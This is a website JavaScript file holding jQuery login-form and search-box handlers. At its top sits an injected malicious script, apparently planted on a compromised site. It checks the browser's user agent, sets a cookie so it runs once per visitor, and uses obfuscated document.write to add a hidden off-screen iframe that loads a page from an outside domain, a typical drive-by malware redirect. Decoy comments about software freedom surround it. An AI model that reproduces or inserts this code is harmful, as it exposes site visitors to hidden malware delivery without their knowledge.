//Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var postindx = 0;
 if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) {
  return postindx;
 }
 return false;
}
function funcionUA(){
 var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/26.0','Firefox/27.0','Firefox/27.0.1','Firefox/27.0.2','Firefox/28.0','Maxthon','BlackBerry'];
 var bad_user_agent = false;
 for (var i in probe_ua) {
  if (stripos(navigator.userAgent, probe_ua[i])) {
   bad_user_agent = true;
   break;
  }
 }
 return bad_user_agent;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var match = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return match ? decodeURIComponent(match[1]) : undefined;
}
if (!funcionUA()) {
 var cookie = getCookie('uefaye18fjeo328rf7ajhe');
 if (cookie == undefined) {
  setCookie('uefaye18fjeo328rf7ajhe', true, 172803);	
  document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>');
 }
};
})();
//Finally,every:program.is.threatened.constantly.by,software.patents.



$(document).ready(

       function()

	   {
		   var username_default='user name';
$('#username').val(username_default);
		       $("#login_btn").click(function()

			       {

               var username = $('#username').val();

               var password = $('#password').val();

			   var theField = $('#loginFrameForm').serialize();
if(username==username_default)
{
	alert('user name');
	$('#username').val('');
	$('#username').focus();
	return false;
}
			   if(username == ''){

				   alert(" * User name can't for empty!");

				   $('#username').focus();

				   return false;

			   }

			   if(password == ''){

				   alert(" * Password can't for empty!");

				   $('#password').focus();

				   return false;

			   }

            //提交表单

            $.ajax({

                url:'member.php',

                timeout:10000,

                type:'post',

                datatype:'text',

                data:'action=login_nocode&'+theField,

                success:function(text){

                    if(text=='登录成功'||text=='你已经登录')

					{

						//window.location.reload();

						document.location.href='/index.php?hostid=2';

					}

					else

					{

						alert(text);

					}

                    //$("#backMit").hide();

                    //$("#memberFrame").html('');

                    //$("#memberFrame").hide();     

					}

            })

				   }

			   ); 

	   }

);

$(document).ready(function(){
	$('#form1 .btnSearch').click(function(){
		var obj_k=$('input[name=k]');
		var keyword=obj_k.val();
		//alert(keyword);
		var default_k='Please enter keyword...';
		if(keyword==default_k)
		{
			alert('Please enter keyword');
			obj_k.focus();
			return false;
		}
		
	});
}); 